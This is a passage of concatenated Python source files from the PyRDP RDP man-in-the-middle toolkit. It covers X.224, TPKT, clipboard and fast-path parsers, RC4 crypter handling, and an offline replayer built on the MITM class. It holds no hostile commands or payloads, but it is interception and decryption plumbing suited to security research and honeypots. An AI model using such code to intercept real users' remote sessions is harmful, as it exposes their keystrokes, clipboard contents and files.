        self.crypter = None
        self.encrypt = self.decrypt = self.sign = self.verify = self.addEncryption = self.addDecryption = self.raiseCrypterUnavailableError

    def raiseCrypterUnavailableError(self):
        raise CrypterUnavailableError("The crypter proxy instance was used before the crypter was generated.")

    def onCrypterGenerated(self, settings: SecuritySettings):
        """
        Called when the crypter has been generated.
        From this point on, the proxy can be used like a normal RC4Crypter.
        :param settings: the event source.
        """

        if self.mode == RC4CrypterProxy.Mode.CLIENT:
            self.crypter = settings.getClientCrypter()
        else:
            self.crypter = settings.getServerCrypter()

        self.encrypt = self.crypter.encrypt
        self.decrypt = self.crypter.decrypt
        self.sign = self.crypter.sign
        self.verify = self.crypter.verify
        self.addEncryption = self.crypter.addEncryption
        self.addDecryption = self.crypter.addDecryption


#
# This file is part of the PyRDP project.
# Copyright (C) 2018-2021 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from pyrdp.parser.gcc import GCCParser
from pyrdp.parser.mcs import MCSParser
from pyrdp.parser.parser import Parser
from pyrdp.parser.player import PlayerParser
from pyrdp.parser.rdp.bitmap import BitmapParser
from pyrdp.parser.rdp.client_info import ClientInfoParser
from pyrdp.parser.rdp.connection import ClientConnectionParser, ServerConnectionParser
from pyrdp.parser.rdp.fastpath import BasicFastPathParser, createFastPathParser, FastPathInputParser, \
    FastPathOutputParser, FIPSFastPathParser, SignedFastPathParser
from pyrdp.parser.rdp.orders import OrdersParser
from pyrdp.parser.rdp.input import SlowPathInputParser
from pyrdp.parser.rdp.licensing import LicensingParser
from pyrdp.parser.rdp.negotiation import NegotiationRequestParser, NegotiationResponseParser
from pyrdp.parser.rdp.ntlmssp import NTLMSSPParser
from pyrdp.parser.rdp.pointer import PointerEventParser
from pyrdp.parser.rdp.security import BasicSecurityParser, FIPSSecurityParser, SignedSecurityParser
from pyrdp.parser.rdp.slowpath import SlowPathParser
from pyrdp.parser.rdp.virtual_channel.clipboard import ClipboardParser
from pyrdp.parser.rdp.virtual_channel.device_redirection import DeviceRedirectionParser
from pyrdp.parser.rdp.virtual_channel.virtual_channel import VirtualChannelParser
from pyrdp.parser.segmentation import SegmentationParser
from pyrdp.parser.tpkt import TPKTParser
from pyrdp.parser.x224 import X224Parser



#
# This file is part of the PyRDP project.
# Copyright (C) 2018 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from pyrdp.core import ObservedBy
from pyrdp.enum import X224PDUType
from pyrdp.layer.layer import IntermediateLayer, LayerStrictRoutedObserver
from pyrdp.parser import X224Parser
from pyrdp.pdu import X224ConnectionConfirmPDU, X224ConnectionRequestPDU, X224DataPDU, X224DisconnectRequestPDU, \
    X224ErrorPDU, X224PDU


class X224Observer(LayerStrictRoutedObserver):
    def __init__(self, **kwargs):
        LayerStrictRoutedObserver.__init__(self, {
            X224PDUType.X224_TPDU_CONNECTION_REQUEST: "onConnectionRequest",
            X224PDUType.X224_TPDU_CONNECTION_CONFIRM: "onConnectionConfirm",
            X224PDUType.X224_TPDU_DISCONNECT_REQUEST: "onDisconnectRequest",
            X224PDUType.X224_TPDU_DATA: "onData",
            X224PDUType.X224_TPDU_ERROR: "onError"
        }, **kwargs)

    def onConnectionRequest(self, pdu: X224ConnectionRequestPDU):
        """
        Called when a Connection Request PDU is received.
        """
        pass

    def onConnectionConfirm(self, pdu: X224ConnectionConfirmPDU):
        """
        Called when a Connection Confirm PDU is received.
        """
        pass

    def onDisconnectRequest(self, pdu: X224DisconnectRequestPDU):
        """
        Called when a Disconnect Request PDU is received.
        """
        pass

    def onData(self, pdu: X224DataPDU):
        """
        Called when a Data PDU is received.
        """
        pass

    def onError(self, pdu: X224ErrorPDU):
        """
        Called when an Error PDU is received.
        """
        pass


@ObservedBy(X224Observer)
class X224Layer(IntermediateLayer):
    """
    Layer to handle X224-related traffic
    ObservedBy: X224Observer
    """

    def __init__(self, parser = X224Parser()):
        super().__init__(parser)

    def sendBytes(self, data: bytes, roa: bool = False, eot: bool = True):
        """
        Encapsulate the payload in a X.224 Data PDU and send it to the previous layer.
        :param data: bytes to send.
        :param eot: End of transmission.
        :param roa: Request of acknowledgement
        """

        pdu = X224DataPDU(roa, eot, data)
        self.previous.sendBytes(self.mainParser.write(pdu))

    def shouldForward(self, pdu: X224PDU) -> bool:
        return pdu.header == X224PDUType.X224_TPDU_DATA

    def sendConnectionRequest(self, payload: bytes, credit = 0, destination = 0, source = 0, options = 0):
        """
        :param payload: the connection request payload.
        :param credit: the PDU's credit property.
        :param destination: the PDU's destination property.
        :param source: the PDU's source property.
        :param options: the PDU's options property.
        """
        pdu = X224ConnectionRequestPDU(credit, destination, source, options, payload)
        self.sendPDU(pdu)

    def sendConnectionConfirm(self, payload: bytes, credit = 0, destination = 0, source = 0, options = 0):
        """
        :param payload: the connection confirm payload.
        :param credit: the PDU's credit property.
        :param destination: the PDU's destination property.
        :param source: the PDU's source property.
        :param options: the PDU's options property.
        """
        pdu = X224ConnectionConfirmPDU(credit, destination, source, options, payload)
        self.sendPDU(pdu)

    def sendDisconnectRequest(self, reason: int, destination = 0, source = 0, payload = b""):
        """
        :param payload: the PDU's payload bytes.
        :param reason: the disconnection reason.
        :param destination: the PDU's destination property.
        :param source: the PDU's source property.
        """

        pdu = X224DisconnectRequestPDU(destination, source, reason, payload)
        self.sendPDU(pdu)

    def sendError(self, cause: int, destination = 0):
        """
        :param cause: the error cause.
        :param destination: the PDU's destination property.
        """
        pdu = X224ErrorPDU(destination, cause)
        self.sendPDU(pdu)



#
# This file is part of the PyRDP project.
# Copyright (C) 2018-2021 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from io import BytesIO

from pyrdp.core import Uint16LE, Uint32LE, Uint64LE
from pyrdp.enum import ClipboardMessageFlags, ClipboardMessageType, ClipboardFormatName, ClipboardFormatNumber
from pyrdp.parser.parser import Parser
from pyrdp.pdu import ClipboardPDU, FormatDataRequestPDU, FormatDataResponsePDU, FormatListPDU, LongFormatName, FileContentsRequestPDU, FileContentsResponsePDU


class ClipboardParser(Parser):
    """
    Parser class for clipboard PDUs
    """

    def __init__(self):
        self.formats = {}  # Supported Clipboard Formats
        self.req = None  # Active Request

        self.dispatch = {
            ClipboardMessageType.CB_FORMAT_DATA_REQUEST: self.parseFormatDataRequest,
            ClipboardMessageType.CB_FORMAT_DATA_RESPONSE: self.parseFormatDataResponse,
            ClipboardMessageType.CB_FORMAT_LIST: self.parseFormatList,
            ClipboardMessageType.CB_FILECONTENTS_REQUEST: self.parseFileContentsRequest,
            ClipboardMessageType.CB_FILECONTENTS_RESPONSE: self.parseFileContentsResponse,
        }

    def doParse(self, data):
        stream = BytesIO(data)
        msgType = Uint16LE.unpack(stream)
        msgFlags = Uint16LE.unpack(stream)
        dataLen = Uint32LE.unpack(stream)
        payload = stream.read(dataLen)

        if msgType in self.dispatch:
            clipboardPDU = self.dispatch[msgType](payload, msgFlags)
        else:
            clipboardPDU = ClipboardPDU(ClipboardMessageType(msgType), msgFlags, payload)

        return clipboardPDU

    def parseFileContentsRequest(self, payload, msgFlags):
        stream = BytesIO(payload)
        streamId = Uint32LE.unpack(stream)
        lindex = Uint32LE.unpack(stream)
        dwFlags =  Uint32LE.unpack(stream)
        posLo = Uint32LE.unpack(stream)
        posHi = Uint32LE.unpack(stream)
        cbRequested = Uint32LE.unpack(stream)
        # clipDataId is optional per-spec [MS-RDPECLIP] Section 2.2.5.3
        # xfreeRDP (and maybe other non-Windows clients?) don't send a clipDataId.
        # Currently we don't use clipDataId for anything, so we can safely just set it to 0.
        try:
            clipDataId = Uint32LE.unpack(stream)
        except ValueError:
            clipDataId = 0

        pos = posHi << 32 | posLo
        return FileContentsRequestPDU(payload, streamId, lindex, msgFlags, dwFlags, pos, cbRequested, clipDataId)

    def parseFileContentsResponse(self, payload, msgFlags):
        stream = BytesIO(payload)
        streamId = Uint32LE.unpack(stream)
        # FIXME: Need to grab the actual file size from the reply.
        data = stream.read()
        return FileContentsResponsePDU(payload, msgFlags, streamId, data)

    def parseFormatDataRequest(self, payload, msgFlags):
        s = BytesIO(payload)
        out = FormatDataRequestPDU(Uint32LE.unpack(s))
        self.req = out
        return out

    def parseFormatDataResponse(self, payload, msgFlags):
        isSuccessful = True if msgFlags & ClipboardMessageFlags.CB_RESPONSE_OK else False
        fid = self.req.requestedFormatId if self.req else ClipboardFormatNumber.GENERIC
        pdu = FormatDataResponsePDU(payload, isSuccessful, fid)

        if isSuccessful and fid in self.formats:
            fmt = str(self.formats[fid])

            if fmt == ClipboardFormatName.FILE_LIST.value:
                stream = BytesIO(payload)
                cItems = Uint32LE.unpack(stream)
                pdu.files = [FileDescriptor.parse(stream) for _ in range(cItems)]

        self.req = None
        return pdu

    def parseFormatList(self, payload, msgFlags):
        # Assumes LongFormatNames. This might be bad. Should check capabilities beforehand

        stream = BytesIO(payload)

        self.formats = {}

        while stream.tell() < len(stream.getvalue()):
            formatId = Uint32LE.unpack(stream)
            formatName = b""
            lastChar = b""

            while lastChar != b"\x00\x00":
                lastChar = stream.read(2)
                if len(lastChar) < 2:
                    raise ValueError("Format name is not null-terminated")
                formatName += lastChar

            self.formats[formatId] = LongFormatName(formatId, formatName)

        return FormatListPDU(dict(self.formats), msgFlags)

    def write(self, pdu):
        """
        :type pdu: ClipboardPDU
        :return: str
        """

        stream = BytesIO()
        Uint16LE.pack(pdu.msgType, stream)
        Uint16LE.pack(pdu.msgFlags, stream)
        if isinstance(pdu, FormatDataResponsePDU):
            self.writeFormatDataResponse(stream, pdu)
        elif isinstance(pdu, FormatDataRequestPDU):
            self.writeFormatDataRequest(stream, pdu)
        elif isinstance(pdu, FormatListPDU):
            self.writeFormatList(stream, pdu)
        else:
            Uint32LE.pack(len(pdu.payload), stream)
            stream.write(pdu.payload)
        return stream.getvalue()

    def writeFormatDataResponse(self, stream, pdu):
        """
        Write the FormatDataResponsePDU starting at dataLen.
        :type stream: BytesIO
        :type pdu: FormatDataResponsePDU
        """
        Uint32LE.pack(len(pdu.requestedFormatData), stream)
        stream.write(pdu.requestedFormatData)

    def writeFormatList(self, stream, pdu):
        """
        Write the FormatListPDU starting at dataLen. Assumes LongFormatNames
        :type stream: BytesIO
        :type pdu: FormatListPDU
        """
        substream = BytesIO()

        for format in pdu.formatList.values():
            Uint32LE.pack(format.formatId, substream)
            formatName = format.formatName
            lastChar = b""
            pos = 0

            while lastChar != b"\x00\x00":
                lastChar = formatName[pos:pos + 2]
                substream.write(lastChar)
                pos += 2

        Uint32LE.pack(len(substream.getvalue()), stream)
        stream.write(substream.getvalue())

    def writeFormatDataRequest(self, stream, pdu):
        """
        Write the FormatDataRequestPDU starting at dataLen. Assumes LongFormatNames.
        :type stream: BytesIO
        :type pdu: FormatDataRequestPDU
        """
        Uint32LE.pack(4, stream)  # datalen
        Uint32LE.pack(pdu.requestedFormatId, stream)



class FileDescriptor:
    """
    https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpeclip/a765d784-2b39-4b88-9faa-88f8666f9c35
    """
    def __init__(self):
        self.flags = 0
        self.attribs = 0
        self.lastWrite = 0
        self.size = 0
        self.filename = ''

    def parse(stream: BytesIO) -> 'FileDescriptor':
        fd = FileDescriptor()
        fd.flags = Uint32LE.unpack(stream)
        stream.read(32)  # reserved1
        fd.attribs = Uint32LE.unpack(stream)
        stream.read(16)  # reserved2

        fd.lastWrite = Uint64LE.unpack(stream)
        sizeHi = Uint32LE.unpack(stream)
        sizeLo = Uint32LE.unpack(stream)
        fd.size = (sizeHi << 32) | sizeLo
        filename = stream.read(520)

        fd.filename = filename.decode('utf-16le').strip('\x00')

        return fd




#
# This file is part of the PyRDP project.
# Copyright (C) 2018 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from io import BytesIO

from pyrdp.core import Uint16BE, Uint8
from pyrdp.exceptions import ParsingError
from pyrdp.parser.segmentation import SegmentationParser
from pyrdp.pdu import TPKTPDU


class TPKTParser(SegmentationParser):
    """
    Parser for TPKT traffic to read and write TPKT messages
    """
    def isCompletePDU(self, data: bytes) -> bool:
        """
        Check if the PDU is fully contained in data.
        :param data: the data.
        """
        if len(data) < 4:
            return False

        length = self.getPDULength(data)
        return len(data) >= length

    def isTPKTPDU(self, data: bytes) -> bool:
        """
        Check if the PDU in data is a TPKT PDU.
        :param data: the data.
        """
        return Uint8.unpack(data[0]) == 3

    def getPDULength(self, data: bytes) -> int:
        """
        Get the length of the PDU contained in data.
        :param data: the PDU data.
        """
        return Uint16BE.unpack(data[2 : 4])

    def parse(self, data: bytes) -> TPKTPDU:
        """
        Read the byte stream and return a TPKTPDU
        """

        _version = Uint8.unpack(data[0 : 1])
        _padding = Uint8.unpack(data[1 : 2])
        length = Uint16BE.unpack(data[2 : 4])
        payload = data[4 : length]

        if len(payload) != length - 4:
            raise ParsingError("Payload is too short for TPKT length field")

        return TPKTPDU(payload)

    def write(self, pdu: TPKTPDU) -> bytes:
        """
        Encode a TPKTPDU into bytes to send on the network.
        """

        stream = BytesIO()
        stream.write(Uint8.pack(pdu.header))
        stream.write(b"\x00")
        stream.write(Uint16BE.pack(len(pdu.payload) + 4))
        stream.write(pdu.payload)

        return stream.getvalue()



#
# This file is part of the PyRDP project.
# Copyright (C) 2018, 2021 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from io import BytesIO

from pyrdp.core import Uint16LE, Uint32LE, Uint8
from pyrdp.enum.virtual_channel.dynamic_channel import CbId, DynamicChannelCommand
from pyrdp.parser import Parser
from pyrdp.pdu import PDU
from pyrdp.pdu.rdp.virtual_channel.dynamic_channel import CreateRequestPDU, CreateResponsePDU, DynamicChannelPDU


class DynamicChannelParser(Parser):
    """
    Parser for the dynamic channel (drdynvc) packets.
    """

    def __init__(self):
        super().__init__()

    def doParse(self, data: bytes) -> PDU:
        stream = BytesIO(data)
        header = Uint8.unpack(stream)
        cbid = (header & 0b00000011)
        sp = (header & 0b00001100) >> 2
        cmd = (header & 0b11110000) >> 4

        if cmd == DynamicChannelCommand.CREATE:
            channelId = self.readChannelId(stream, cbid)
            channelName = ""
            char = stream.read(1).decode()
            while char != "\x00":
                if len(char) == 0:
                    raise ValueError("Channel name is not null-terminated")
                channelName += char
                char = stream.read(1).decode()
            return CreateRequestPDU(cbid, sp, channelId, channelName)
        return DynamicChannelPDU(cbid, sp, cmd, stream.read())

    def write(self, pdu: DynamicChannelPDU) -> bytes:
        stream = BytesIO()
        header = pdu.cbid
        header |= pdu.sp << 2
        header |= pdu.cmd << 4
        Uint8.pack(header, stream)
        if isinstance(pdu, CreateResponsePDU):
            self.writeChannelId(stream, pdu.cbid, pdu.channelId)
            Uint32LE.pack(pdu.creationStatus, stream)
        else:
            raise NotImplementedError()
        return stream.getvalue()

    def readChannelId(self, stream: BytesIO, cbid: int):
        if cbid == CbId.ONE_BYTE:
            return Uint8.unpack(stream)
        elif cbid == CbId.TWO_BYTE:
            return Uint16LE.unpack(stream)
        elif cbid == CbId.FOUR_BYTES:
            return Uint16LE.unpack(stream)
        else:
            raise ValueError(f"Invalid channel id length: {cbid}")

    def writeChannelId(self, stream: BytesIO, cbid: int, channelId: int):
        if cbid == CbId.ONE_BYTE:
            return Uint8.pack(channelId, stream)
        elif cbid == CbId.TWO_BYTE:
            return Uint16LE.pack(channelId, stream)
        elif cbid == CbId.FOUR_BYTES:
            return Uint16LE.pack(channelId, stream)
        else:
            raise ValueError(f"Invalid channel id length: {cbid}")



#
# This file is part of the PyRDP project.
# Copyright (C) 2018 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from pyrdp.enum import PointerEventType
from pyrdp.pdu.pdu import PDU


class Point:
    def __init__(self, x, y):
        self.x = x
        self.y = y


class PointerEvent(PDU):
    def __init__(self, messageType):
        super().__init__()
        self.messageType = messageType


class PointerSystemEvent(PointerEvent):
    def __init__(self, pointerType):
        PointerEvent.__init__(self, PointerEventType.TS_PTRMSGTYPE_SYSTEM)
        self.pointerType = pointerType


class PointerPositionEvent(PointerEvent):
    def __init__(self, point):
        PointerEvent.__init__(self, PointerEventType.TS_PTRMSGTYPE_POSITION)
        self.point = point


class PointerColorEvent(PointerEvent):
    def __init__(self, cacheIndex, hotSpot, width, height, andMask, xorMask):
        PointerEvent.__init__(self, PointerEventType.TS_PTRMSGTYPE_COLOR)
        self.cacheIndex = cacheIndex
        self.hotSpot = hotSpot
        self.width = width
        self.height = height
        self.andMask = andMask
        self.xorMask = xorMask


class PointerCacheEvent(PointerEvent):
    def __init__(self, cacheIndex):
        PointerEvent.__init__(self, PointerEventType.TS_PTRMSGTYPE_CACHED)
        self.cacheIndex = cacheIndex


class PointerNewEvent(PointerEvent):
    def __init__(self, xorBPP, color):
        PointerEvent.__init__(self, PointerEventType.TS_PTRMSGTYPE_POINTER)
        self.xorBPP = xorBPP
        self.color = color



#
# This file is part of the PyRDP project.
# Copyright (C) 2019-2023 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from typing import Dict

from PySide6.QtCore import Qt
from PySide6.QtGui import QResizeEvent
from PySide6.QtWidgets import QWidget

from pyrdp.player.BaseWindow import BaseWindow
from pyrdp.player.ReplayTab import ReplayTab


class ReplayWindow(BaseWindow):
    """
    Class for managing replay tabs.
    """

    def __init__(self, options: Dict[str, object], parent: QWidget):
        super().__init__(options, parent=parent)

    def openFile(self, fileName: str, autoplay: bool = False):
        """
        Open a replay file and open a new tab.
        :param fileName: replay path.
        """
        tab = ReplayTab(fileName, parent=self)
        self.addTab(tab, fileName)
        self.log.debug("Loading replay file %(arg1)s", {"arg1": fileName})
        tab.viewer.setFocus(Qt.MouseFocusReason)
        if autoplay:
            tab.play()

    def resizeEvent(self, event: QResizeEvent):
        super().resizeEvent(event)
        for i in range(self.count()):
            self.widget(i).parentResized(event)



#
# This file is part of the PyRDP project.
# Copyright (C) 2021 GoSecure Inc.
# Licensed under the GPLv3 or later.
#
import logging
from pathlib import Path
from typing import List

from pyrdp.convert.utils import HANDLERS
from pyrdp.layer import LayerChainItem, PlayerLayer
from pyrdp.logging import LOGGER_NAMES, SessionLogger
from pyrdp.mitm import MITMConfig, RDPMITM
from pyrdp.mitm.MITMRecorder import MITMRecorder
from pyrdp.mitm.state import RDPMITMState
from pyrdp.player import BaseEventHandler
from pyrdp.recording import FileLayer


class RDPReplayerConfig(MITMConfig):
    @property
    def replayDir(self) -> Path:
        return self.outDir


class OfflineRecorder(MITMRecorder):
    def __init__(self, transports: List[LayerChainItem], state: RDPMITMState):
        super().__init__(transports, state)
        self.currentTimeStamp: int = 0

    def getCurrentTimeStamp(self) -> int:
        return self.currentTimeStamp

    def setCurrentTimeStamp(self, timeStamp: int):
        self.currentTimeStamp = timeStamp


class ConversionLayer(LayerChainItem):
    """Thin layer that adds a conversion handler to the player."""

    def __init__(self, handler: BaseEventHandler):
        super().__init__()
        self.sink = handler
        self.player = PlayerLayer()
        self.player.addObserver(handler)

    @property
    def filename(self):
        return self.sink.filename

    def sendBytes(self, data: bytes):
        self.player.recv(data)


class RDPReplayer(RDPMITM):
    def __init__(self, handler, outputPath: str, sessionID: str):
        def sendBytesStub(_: bytes):
            pass

        output_directory = Path(outputPath)
        logger = logging.getLogger(LOGGER_NAMES.MITM_CONNECTIONS)
        log = SessionLogger(logger, "replay")

        config = RDPReplayerConfig()
        config.outDir = output_directory
        config.outDir.mkdir(exist_ok=True)

        # We'll set up the recorder ourselves
        config.recordReplays = False

        state = RDPMITMState(config, sessionID)

        self.transport = ConversionLayer(handler) if handler else FileLayer(output_directory / (sessionID + '.' + HANDLERS['replay'][1]))

        rec = OfflineRecorder([self.transport], state)

        super().__init__(log, log, config, state, rec)

        self.client.tcp.sendBytes = sendBytesStub
        self.server.tcp.sendBytes = sendBytesStub
        self.state.useTLS = True

    def start(self):
        pass

    def recv(self, data: bytes, from_client: bool):
        try:
            if from_client:
                self.client.tcp.dataReceived(data)
            else:
                self.server.tcp.dataReceived(data)
        except Exception as e:
            print(f"\n[-] Failed to handle data, continuing anyway: {e}")

    def setTimeStamp(self, timeStamp: float):
        self.recorder.setCurrentTimeStamp(int(timeStamp))

    def connectToServer(self):
        pass

    def startTLS(self, onTlsReady):
        pass

    def sendPayload(self):
        pass

    @property
    def filename(self):
        """The destination filename for this replay"""
        return self.transport.filename



#
# This file is part of the PyRDP project.
# Copyright (C) 2018-2023 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

import logging

from PySide6.QtCore import Qt
from PySide6.QtWidgets import QScrollArea, QTextEdit, QVBoxLayout, QWidget

from pyrdp.logging import LOGGER_NAMES
from pyrdp.ui import QRemoteDesktop


class BaseTab(QWidget):
    """
    Class that encapsulates logic for a tab that displays an RDP connection, regardless of its origin
    (network or file).
    """

    def __init__(self, viewer: QRemoteDesktop, parent: QWidget = None):
        """
        :param viewer: the RDP viewer widget
        :param parent: the parent widget
        """
        super().__init__(parent, Qt.WindowFlags())
        self.widget = viewer

        self.writeInCaps = False
        self.text = QTextEdit()
        self.text.setReadOnly(True)
        self.text.setMinimumHeight(150)
        self.log = logging.getLogger(LOGGER_NAMES.PLAYER)

        self.tabLayout = QVBoxLayout()

        self.scrollViewer = QScrollArea()
        self.scrollViewer.setWidget(self.widget)

        self.tabLayout.addWidget(self.scrollViewer, 10)
        self.tabLayout.addWidget(self.text, 2)

        self.setLayout(self.tabLayout)



#
# This file is part of the PyRDP project.
# Copyright (C) 2018-2021 GoSecure Inc.
# Licensed under the GPLv3 or later.
#
from typing import List, Union
from binascii import hexlify
from io import BytesIO

from pyrdp.core import Uint16BE, Uint16LE, Uint8
from pyrdp.enum import EncryptionMethod, FastPathInputType, \
    FastPathOutputCompressionType, FastPathOutputType, FastPathSecurityFlags, FIPSVersion, ParserMode
from pyrdp.pdu import FastPathBitmapEvent, FastPathEventRaw, FastPathMouseEvent, FastPathOrdersEvent, FastPathPDU, \
    FastPathScanCodeEvent
from pyrdp.pdu.rdp.fastpath import FastPathEvent, FastPathOutputEvent, FastPathUnicodeEvent
from pyrdp.security import RC4Crypter, RC4CrypterProxy

from pyrdp.parser.parser import Parser
from pyrdp.parser.rdp.bitmap import BitmapParser
from pyrdp.parser.rdp.security import BasicSecurityParser

from pyrdp.logging import log


class BasicFastPathParser(BasicSecurityParser):
    def __init__(self, mode: ParserMode):
        super().__init__()

        self.mode = mode
        input, output = FastPathInputParser(), FastPathOutputParser()

        if mode == ParserMode.CLIENT:
            self.readParser = output
            self.writeParser = input
        else:
            self.readParser = input
            self.writeParser = output

    def getPDULength(self, data: bytes) -> int:
        stream = BytesIO(data)
        stream.read(1)
        return self.parseLength(stream)

    def isCompletePDU(self, data: bytes) -> bool:
        if len(data) == 1:
            return False

        if Uint8.unpack(data[1]) & 0x80 != 0 and len(data) == 2:
            return False

        return len(data) >= self.getPDULength(data)

    def doParse(self, data: bytes) -> FastPathPDU:
        stream = BytesIO(data)
        header = Uint8.unpack(stream)
        eventCount = self.parseEventCount(header)
        pduLength = self.parseLength(stream)

        if eventCount == 0:
            eventCount = Uint8.unpack(stream)

        data = stream.read(pduLength - stream.tell())
        events = self.parseEvents(data)
        return FastPathPDU(header, events)

    def parseEventCount(self, header: int) -> int:
        if self.mode == ParserMode.SERVER:
            return (header >> 2) & 0xf
        else:
            return 1

    def parseLength(self, stream: BytesIO) -> int:
        length = Uint8.unpack(stream)

        if length & 0x80 != 0:
            length = ((length & 0x7f) << 8) | Uint8.unpack(stream)

        return length

    def parseEvents(self, data: bytes) -> List[FastPathEvent]:
        events = []

        while len(data) > 0:
            eventLength = self.readParser.getEventLength(data)
            eventData = data[: eventLength]
            data = data[eventLength:]

            try:
                event = self.readParser.parse(eventData)
            except KeyboardInterrupt:
                raise
            except Exception:
                log.error("Exception occurred when receiving: %(exceptionData)s", {"exceptionData": hexlify(eventData)})
                raise

            events.append(event)

        return events

    def writeHeader(self, stream: BytesIO, pdu: FastPathPDU):
        header = (pdu.header & 0xc0) | self.getHeaderFlags()
        eventCount = len(pdu.events)

        if eventCount <= 15 and self.mode == ParserMode.CLIENT:
            header |= eventCount << 2

        Uint8.pack(header, stream)
        self.writeLength(stream, pdu)

    def writeBody(self, stream: BytesIO, pdu: FastPathPDU):
        eventCount = len(pdu.events)

        if self.mode == ParserMode.CLIENT and eventCount > 15:
            Uint8.pack(eventCount, stream)

    def writePayload(self, stream: BytesIO, pdu: FastPathPDU):
        self.writeEvents(stream, pdu)

    def writeLength(self, stream: BytesIO, pdu: FastPathPDU):
        length = self.calculatePDULength(pdu)
        Uint16BE.pack(length | 0x8000, stream)

    def writeEvents(self, stream: BytesIO, pdu: FastPathPDU):
        for event in pdu.events:
            eventData = self.writeParser.write(event)
            stream.write(eventData)

    def calculatePDULength(self, pdu: FastPathPDU) -> int:
        # Header + length bytes
        length = 3
        length += sum(self.writeParser.getEventLength(event) for event in pdu.events)

        if self.mode == ParserMode.CLIENT and len(pdu.events) > 15:
            length += 1

        return length

    def getHeaderFlags(self) -> int:
        return 0


class SignedFastPathParser(BasicFastPathParser):
    def __init__(self, crypter: RC4Crypter, mode: ParserMode):
        BasicFastPathParser.__init__(self, mode)
        self.crypter = crypter
        self.eventData = b""

    def doParse(self, data: bytes) -> FastPathPDU:
        stream = BytesIO(data)
        header = Uint8.unpack(stream)
        eventCount = self.parseEventCount(header)
        pduLength = self.parseLength(stream)
        stream.read(8)  # signature (unused)

        if eventCount == 0:
            eventCount = Uint8.unpack(stream)

        data = stream.read(pduLength - stream.tell())

        if header & FastPathSecurityFlags.FASTPATH_OUTPUT_ENCRYPTED != 0:
            data = self.crypter.decrypt(data)
            self.crypter.addDecryption()

        events = self.parseEvents(data)
        return FastPathPDU(header, events)

    def writeBody(self, stream: BytesIO, pdu: FastPathPDU):
        eventStream = BytesIO()
        self.writeEvents(eventStream, pdu)
        self.eventData = eventStream.getvalue()
        signature = self.crypter.sign(self.eventData, True)

        stream.write(signature)
        BasicFastPathParser.writeBody(self, stream, pdu)

    def writePayload(self, stream: BytesIO, pdu: FastPathPDU):
        eventData = self.crypter.encrypt(self.eventData)
        self.crypter.addEncryption()
        self.eventData = b""

        stream.write(eventData)

    def calculatePDULength(self, pdu: FastPathPDU) -> int:
        return BasicFastPathParser.calculatePDULength(self, pdu) + 8

    def getHeaderFlags(self) -> FastPathSecurityFlags:
        return FastPathSecurityFlags.FASTPATH_OUTPUT_ENCRYPTED | FastPathSecurityFlags.FASTPATH_OUTPUT_SECURE_CHECKSUM


class FIPSFastPathParser(SignedFastPathParser):
    def __init__(self, crypter: RC4Crypter, mode: ParserMode):
        SignedFastPathParser.__init__(self, crypter, mode)

    def doParse(self, data: bytes) -> FastPathPDU:
        stream = BytesIO(data)
        header = Uint8.unpack(stream)
        eventCount = self.parseEventCount(header)
        pduLength = self.parseLength(stream)
        Uint16LE.unpack(stream)  # fipsLength (unused)
        Uint8.unpack(stream)  # version (unused)
        Uint8.unpack(stream)  # padLength (unused)
        stream.read(8)  # signature (unused)

        if eventCount == 0:
            eventCount = Uint8.unpack(stream)

        data = stream.read(pduLength - stream.tell())

        if header & FastPathSecurityFlags.FASTPATH_OUTPUT_ENCRYPTED != 0:
            data = self.crypter.decrypt(data)
            self.crypter.addDecryption()

        events = self.parseEvents(data)
        return FastPathPDU(header, events)

    def writeBody(self, stream: BytesIO, pdu: FastPathPDU):
        bodyStream = BytesIO()
        SignedFastPathParser.writeBody(self, bodyStream, pdu)
        body = bodyStream.getvalue()

        Uint16LE.pack(0x10, stream)
        Uint8.pack(FIPSVersion.TSFIPS_VERSION1, stream)
        Uint8.pack(self.crypter.getPadLength(self.eventData), stream)
        stream.write(body)

    def calculatePDULength(self, pdu: FastPathPDU) -> int:
        return super().calculatePDULength(pdu) + 4


class FastPathInputParser(Parser):
    INPUT_EVENT_LENGTHS = {
        FastPathInputType.FASTPATH_INPUT_EVENT_SCANCODE: 2,
        FastPathInputType.FASTPATH_INPUT_EVENT_MOUSE: 7,
        FastPathInputType.FASTPATH_INPUT_EVENT_MOUSEX: 7,
        FastPathInputType.FASTPATH_INPUT_EVENT_SYNC: 1,
        FastPathInputType.FASTPATH_INPUT_EVENT_UNICODE: 3,
        FastPathInputType.FASTPATH_INPUT_EVENT_QOE_TIMESTAMP: 5,
    }

    def getEventLength(self, data: bytes) -> int:
        if isinstance(data, FastPathEventRaw):
            return len(data.data)
        elif isinstance(data, bytes):
            header = Uint8.unpack(data[0])
            type = (header & 0b11100000) >> 5
            return FastPathInputParser.INPUT_EVENT_LENGTHS[type]
        elif isinstance(data, FastPathScanCodeEvent):
            return FastPathInputParser.INPUT_EVENT_LENGTHS[FastPathInputType.FASTPATH_INPUT_EVENT_SCANCODE]
        elif isinstance(data, FastPathMouseEvent):
            return FastPathInputParser.INPUT_EVENT_LENGTHS[FastPathInputType.FASTPATH_INPUT_EVENT_MOUSE]
        elif isinstance(data, FastPathUnicodeEvent):
            return FastPathInputParser.INPUT_EVENT_LENGTHS[FastPathInputType.FASTPATH_INPUT_EVENT_UNICODE]

        raise ValueError("Unsupported event type?")

    def doParse(self, data: bytes) -> FastPathEvent:
        stream = BytesIO(data)
        eventHeader = Uint8.unpack(stream.read(1))
        eventCode = (eventHeader & 0b11100000) >> 5
        eventFlags = eventHeader & 0b00011111

        if eventCode == FastPathInputType.FASTPATH_INPUT_EVENT_SCANCODE:
            return self.parseScanCodeEvent(eventFlags, eventHeader, stream)
        elif eventCode == FastPathInputType.FASTPATH_INPUT_EVENT_MOUSE:
            return self.parseMouseEvent(eventHeader, stream)
        elif eventCode == FastPathInputType.FASTPATH_INPUT_EVENT_UNICODE:
            return self.parseUnicodeEvent(eventHeader, stream)

        return FastPathEventRaw(data)

    def parseScanCodeEvent(self, eventFlags: int, eventHeader: int, stream: BytesIO) -> FastPathScanCodeEvent:
        scanCode = Uint8.unpack(stream.read(1))
